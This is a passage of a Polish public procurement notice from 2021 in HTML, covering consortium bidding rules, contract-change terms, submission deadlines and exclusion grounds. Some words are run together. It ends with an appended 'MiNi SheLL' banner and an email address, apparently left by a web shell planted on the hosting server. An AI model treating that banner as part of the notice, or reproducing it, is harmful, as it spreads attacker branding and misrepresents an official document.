oferty. Ponadto,każdyze wspólników spółki cywilnej zobowiązany jest załączyć wraz z ofertą oświadczenia oniepodleganiu wykluczeniu - wg zał. nr 4 do SWZ. 5. Wykonawcy wspólnie ubiegający sięoudzielenie zamówienia (wspólnicy spółki cywilnej) składają wraz z ofertą oświadczenieozakresie wykonania zamówienia przez wykonawców wspólnie ubiegających się oudzieleniezamówienia – wg zał. nr 5 do SWZ (wzór). 6. Wszyscy wykonawcy składający wspólnąofertębędą ponosić odpowiedzialność solidarną za wykonanie umowy i wniesienienależytegowykonania umowy. Zamawiający może w ramach odpowiedzialności solidarnejżądaćwykonania umowy od wszystkich wykonawców łącznie lub od każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe przesłanki zmiany treści umowy zostały okreslone w Projektowanych Postanowieniach Umowy - załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty” dostępnego na ePUAP i udostępnionego również na MiniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-11 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający przewiduje wykluczenie wykonawcy w zakresie podstaw określonych wart.108ust. 1 pkt. 1) – 6) oraz art. 109 ust. 1 pkt. 4) Pzp. 2. Wykonawcy, jeżeli ma lub miałintereswuzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wynikunaruszeniaprzez zamawiającego przepisów Pzp przysługują środki ochrony prawnej określone wDziale IXPzp.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com